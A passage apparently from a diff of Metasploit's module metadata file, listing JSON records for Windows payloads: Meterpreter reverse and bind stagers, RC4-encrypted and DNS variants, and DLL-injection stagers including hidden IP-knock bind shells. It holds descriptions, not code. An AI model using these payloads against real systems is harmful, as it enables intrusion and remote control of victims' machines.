", - "mihi", - "RageLtMan" - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_windows/meterpreter/reverse_tcp_rc4_dns": { - "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/windows/meterpreter/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "RageLtMan" - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_windows/meterpreter/reverse_tcp_uuid": { - "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support", - "fullname": "payload/windows/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker with UUID Support", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_windows/meterpreter/reverse_winhttp": { - "name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)", - "fullname": "payload/windows/meterpreter/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "Borja Merino " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_winhttp" - }, - "payload_windows/meterpreter/reverse_winhttps": { - "name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)", - "fullname": "payload/windows/meterpreter/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "Borja Merino " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTPS (Windows winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_winhttps.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_winhttps" - }, - "payload_windows/meterpreter_bind_named_pipe": { - "name": "Windows Meterpreter Shell, Bind Named Pipe Inline", - "fullname": "payload/windows/meterpreter_bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "UserExistsError", - "sf ", - "OJ Reeves" - ], - "description": "Connect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter_bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/meterpreter_bind_tcp": { - "name": "Windows Meterpreter Shell, Bind TCP Inline", - "fullname": "payload/windows/meterpreter_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/meterpreter_bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/meterpreter_reverse_http": { - "name": "Windows Meterpreter Shell, Reverse HTTP Inline", - "fullname": "payload/windows/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/meterpreter_reverse_https": { - "name": "Windows Meterpreter Shell, Reverse HTTPS Inline", - "fullname": "payload/windows/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/meterpreter_reverse_ipv6_tcp": { - "name": "Windows Meterpreter Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/windows/meterpreter_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/meterpreter_reverse_tcp": { - "name": "Windows Meterpreter Shell, Reverse TCP Inline", - "fullname": "payload/windows/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/metsvc_bind_tcp": { - "name": "Windows Meterpreter Service, Bind TCP", - "fullname": "payload/windows/metsvc_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Stub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/metsvc_bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/metsvc_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/metsvc_reverse_tcp": { - "name": "Windows Meterpreter Service, Reverse TCP Inline", - "fullname": "payload/windows/metsvc_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Stub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - 
"autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/metsvc_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/metsvc_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/patchupdllinject/bind_hidden_ipknock_tcp": { - "name": "Windows Inject DLL, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/windows/patchupdllinject/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf ", - "Borja Merino " - ], - "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_windows/patchupdllinject/bind_hidden_tcp": { - "name": "Windows Inject DLL, Hidden Bind TCP Stager", - "fullname": "payload/windows/patchupdllinject/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf ", - "Borja Merino " - ], - "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": 
"windows/bind_hidden_tcp" - }, - "payload_windows/patchupdllinject/bind_ipv6_tcp": { - "name": "Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/windows/patchupdllinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Inject a custom DLL into the exploited process.\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_windows/patchupdllinject/bind_ipv6_tcp_uuid": { - "name": "Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/patchupdllinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf ", - "OJ Reeves" - ], - "description": "Inject a custom DLL into the exploited process.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_windows/patchupdllinject/bind_named_pipe": { - "name": "Windows Inject DLL, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/windows/patchupdllinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "UserExistsError" - ], - "description": "Inject a custom DLL into the exploited process.\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_windows/patchupdllinject/bind_nonx_tcp": { - "name": "Windows Inject DLL, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/windows/patchupdllinject/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "vlad902 " - ], - "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", - 
"is_install_path": true, - "ref_name": "windows/patchupdllinject/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_windows/patchupdllinject/bind_tcp": { - "name": "Windows Inject DLL, Bind TCP Stager (Windows x86)", - "fullname": "payload/windows/patchupdllinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_tcp" - }, - "payload_windows/patchupdllinject/bind_tcp_rc4": { - "name": "Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/patchupdllinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - 
"mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_windows/patchupdllinject/bind_tcp_uuid": { - "name": "Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/patchupdllinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_windows/patchupdllinject/find_tag": { - "name": "Windows Inject DLL, Find Tag Ordinal Stager", - "fullname": "payload/windows/patchupdllinject/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape " - ], - "description": "Inject a custom DLL into the exploited process.\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "x86", - 
"rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/findtag_ord.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/findtag_ord" - }, - "payload_windows/patchupdllinject/reverse_ipv6_tcp": { - "name": "Windows Inject DLL, Reverse TCP Stager (IPv6)", - "fullname": "payload/windows/patchupdllinject/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_windows/patchupdllinject/reverse_nonx_tcp": { - "name": "Windows Inject DLL, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/windows/patchupdllinject/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "vlad902 " - ], - "description": "Inject a custom DLL into the exploited 
process.\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_windows/patchupdllinject/reverse_ord_tcp": { - "name": "Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/windows/patchupdllinject/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "spoonm " - ], - "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_windows/patchupdllinject/reverse_tcp": { - "name": "Windows Inject DLL, Reverse TCP Stager", - "fullname": "payload/windows/patchupdllinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - 
"jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp" - }, - "payload_windows/patchupdllinject/reverse_tcp_allports": { - "name": "Windows Inject DLL, Reverse All-Port TCP Stager", - "fullname": "payload/windows/patchupdllinject/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Inject a custom DLL into the exploited process.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_windows/patchupdllinject/reverse_tcp_dns": { - "name": "Windows Inject DLL, Reverse TCP Stager (DNS)", - 
"fullname": "payload/windows/patchupdllinject/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf ", - "RageLtMan" - ], - "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_windows/patchupdllinject/reverse_tcp_rc4": { - "name": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/patchupdllinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - 
